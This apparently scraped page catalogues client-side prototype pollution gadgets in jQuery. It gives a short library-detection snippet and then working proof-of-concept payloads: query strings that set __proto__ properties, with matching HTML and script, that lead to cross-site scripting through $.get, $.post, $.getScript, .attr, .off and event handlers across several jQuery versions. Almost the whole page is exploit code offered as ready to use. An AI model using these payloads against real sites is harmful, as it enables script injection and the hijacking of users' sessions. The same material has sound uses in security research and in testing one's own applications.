URL: https://jquery.com/
return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')
- Can be exploited through String.prototype
?__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%3dalert(document.domain)>
<script/src=https://code.jquery.com/jquery-3.3.1.js></script>
<script>
Object.prototype.preventDefault='x'
Object.prototype.handleObj='x'
Object.prototype.delegateTarget='<img/src/onerror=alert(1)>'
/* No extra code needed for jQuery 1 & 2 */
$(document).off('foobar');
</script>?__proto__[div][0]=1&__proto__[div][1]=<img src onerror%3dalert(1)>
<script/src=https://code.jquery.com/jquery-3.3.1.js></script>
<script>
Object.prototype.div=['1','<img src onerror=alert(1)>']
</script>
<script>
$('<div x="x"></div>')
</script>- Also can be used for
$.post, $ .ajax, $.getJSON - Can be exploited through Boolean.prototype
?__proto__[url][]=data:,alert(1)//&__proto__[dataType]=script
<script src=https://code.jquery.com/jquery-3.5.1.js></script>
<script>
Object.prototype.url = ['data:,alert(1)//'];
Object.prototype.dataType = 'script';
</script>
<script>
$.get('https://google.com/');
$.post('https://google.com/');
</script>?__proto__[src][]=data:,alert(1)//
<script src=https://code.jquery.com/jquery-3.5.1.js></script>
<script>
Object.prototype.src = ['data:,alert(1)//']
</script>
<script>
$.getScript('https://google.com/')
</script>- Can be exploited through Boolean.prototype
?__proto__[url]=data:,alert(1)//
<script/src=https://code.jquery.com/jquery-3.3.1.js></script>
<script>
Object.prototype.url = 'data:,alert(1)//'
</script>
<script>
$.getScript('https://google.com/')
</script>?__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x
<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/1.10.0/jquery.js></script>
<script>
Object.prototype.context = '<img/src/onerror=alert(1)>';
Object.prototype.jquery = 'x';
</script>
<script>
jQuery.get('http://google.com/');
</script>- Can be exploited through Boolean.prototype
?__proto__[url]=data:,alert(1)//&__proto__[dataType]=script&__proto__[crossDomain]=
<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.js></script>
<script>
Object.prototype.url = 'data:,alert(1)//';
Object.prototype.dataType = 'script';
Object.prototype.crossDomain = '';
</script>
<script>
$.get('http://google.com/');
$.post('http://google.com/');
</script>- Sets the attribute of an element
?__proto__[OnError]=alert(1)&__proto__[SRC]=fakeimagewontload
<img id="test" src=realimage.jpg>
<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.js></script>
<script>
Object.prototype.OnError = 'alert(1)';
Object.prototype.SRC = 'fakeimagewontload.jpg';
</script>
<script>
$('#test').attr({"width":"100%"}) // The {} is being polluted with extra attributes
</script>- Requires user interaction
- Can be exploited through Function.prototype
?__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror%3Dalert(1)>&__proto__[focus]=x&__proto__[needsContext]=x
<script src=https://code.jquery.com/jquery-3.7.1.js></script>
<form id="search">
<input id="y" />
</form>
<script>
Object.prototype.handler = ["x"];
Object.prototype.selector = ["<img/src/onerror=alert(1)>"];
Object.prototype.delegateType = "focus";
Object.prototype.needsContext = "x";
</script>
<script>
$("#search").submit(() => {});
</script>?__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror%3Dalert(1)>&__proto__[needsContext]=x
<script src=https://code.jquery.com/jquery-1.9.0.js></script>
<div id="search">
<div>Test</div>
</div>
<script>
Function.prototype.handler = ["x"];
Function.prototype.selector = ["<img/src/onerror=alert(123)>"];
Function.prototype.needsContext = "x";
</script>
<script>
$("#search").on("click", () => {});
</script>